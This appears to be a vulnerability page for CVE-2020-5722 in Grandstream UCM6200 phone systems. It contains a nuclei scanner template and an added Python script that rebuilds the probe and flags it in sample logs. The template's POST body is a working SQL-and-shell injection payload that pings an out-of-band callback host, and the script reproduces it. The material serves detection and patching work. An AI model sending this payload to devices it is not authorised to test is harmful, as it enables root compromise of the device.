Vulnerability description
The Grandstream UCM6200 series contains an unauthenticated SQL injection in its HTTP interface, triggered by a crafted HTTP request. On firmware before 1.0.19.20 an attacker can use it to execute shell commands as root; on firmware before 1.0.20.17 the same flaw still allows injecting HTML into emails sent by the device.
id: CVE-2020-5722

info:
  name: Grandstream UCM6200 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
  impact: |
    Attackers can execute root shell commands or inject malicious HTML, leading to full device compromise or phishing attacks.
  remediation: |
    Update to version 1.0.19.20 or later for root command execution fix, and version 1.0.20.17 or later for email injection fix.
  reference:
    - https://threatprotect.qualys.com/2020/04/01/grandstream-ucm62xx-remote-code-execution-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5722
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-5722
    epss-score: 0.93481
    epss-percentile: 0.99812
    cwe-id: CWE-89
  metadata:
    verified: false
    max-request: 1
    shodan-query: 'ssl:"Grandstream" "Set-Cookie: TRACKID"'
  tags: cve,cve2020,grandstream,sqli,rce,vuln,kev,vkev

# Single unauthenticated POST to the sendPasswordEmail action. The quote and
# SQL comment break out of the user_name string; the backtick-wrapped ping is
# then executed by the shell and is confirmed through the interactsh DNS callback.
http:
  - raw:
      - |
        POST /cgi? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 87

        action=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}{{interactsh-url}}`;`

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'interactsh_protocol == "dns"'
        condition: and
# digest: 4a0a00473045022100f43ec6300e5344533201a8b275e897ac8be11e4d33781b818700fcbc2e8aa5ff022025c3d7e91313594ce0902d0810c221502cc7023fdc0262956ef8ec0e4d44500c:922c64590222798bb761d5b6d8e72950
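As an added example (not part of the nuclei template, the Grandstream firmware, or the referenced write-ups), the Python below does two things with the request shape the template sends: `build_probe_body` reproduces the POST body with the `{{interactsh-url}}` placeholder replaced by an assumed, tester-controlled callback domain, and `detect` runs over constructed log lines from an assumed reverse-proxy format that records POST bodies (`<ip> <method> <path> <body>`) and flags `sendPasswordEmail` requests whose `user_name` carries SQL or shell metacharacters. The body is URL-decoded before matching, so percent-encoded variants of the same payload are caught as well; the sample log and the callback domain are constructed for the example.

```python
# Added example: builds the probe body the nuclei template for CVE-2020-5722 posts to
# /cgi? and flags matching requests in constructed, assumed-format log lines.
# Nothing here is code from the template, the device, or the referenced advisories.
from urllib.parse import unquote_plus

# Metacharacters a legitimate user_name never needs: quote/comment for the SQL
# injection, backticks/$()/;/|/${IFS} for the shell part of the template's payload.
SQLI_MARKERS = ("'", "--")
SHELL_MARKERS = ("`", "$(", ";", "|", "${IFS}")

# Constructed sample log (assumed "<ip> <method> <path> <body>" proxy format):
# 1) the template's payload with an assumed callback domain, 2) a percent-encoded
# SQL-only variant, 3) a benign password-reset request, 4) an unrelated action.
SAMPLE_LOG = """\
203.0.113.7 POST /cgi? action=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}abc.oast.example`;`
198.51.100.4 POST /cgi? action=sendPasswordEmail&user_name=admin%27+or+1%3D1--
192.0.2.9 POST /cgi? action=sendPasswordEmail&user_name=jsmith
192.0.2.9 POST /cgi? action=login&username=jsmith&password=hunter2
"""


def build_probe_body(callback_host: str) -> str:
    """Form body the template sends, with {{interactsh-url}} replaced by
    callback_host (an assumed domain the tester controls)."""
    return ("action=sendPasswordEmail"
            "&user_name=admin'+or+1=1--`;`ping${IFS}" + callback_host + "`;`")


def parse_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded decoder (first value wins).
    Hand-rolled because parse_qs treated ';' as a separator in older Python
    versions, and ';' is part of the payload we want to keep intact."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def classify_body(body: str) -> dict:
    """Decode a body and classify it: 'rce' if user_name carries shell
    metacharacters, 'sqli' if only SQL metacharacters, else 'benign'."""
    fields = parse_form(body)
    user_name = fields.get("user_name", "")
    sqli = [m for m in SQLI_MARKERS if m in user_name]
    shell = [m for m in SHELL_MARKERS if m in user_name]
    if fields.get("action") != "sendPasswordEmail" or not (sqli or shell):
        kind = "benign"
    elif shell:
        kind = "rce"
    else:
        kind = "sqli"
    return {"action": fields.get("action", ""), "user_name": user_name,
            "sqli_markers": sqli, "shell_markers": shell, "kind": kind}


def detect(log_text: str) -> list:
    """Return one hit per non-benign POST to /cgi in the assumed log format."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        ip, method, path, body = parts
        if method != "POST" or not path.startswith("/cgi"):
            continue
        verdict = classify_body(body)
        if verdict["kind"] != "benign":
            hits.append({"ip": ip, **verdict})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ip"], hit["kind"], repr(hit["user_name"]))
```

The detector keys on the decoded `user_name` rather than on the literal template string, so a `$(...)` substitution or a differently encoded quote still triggers; it deliberately ignores other actions, since the page only establishes `sendPasswordEmail` as the reachable sink.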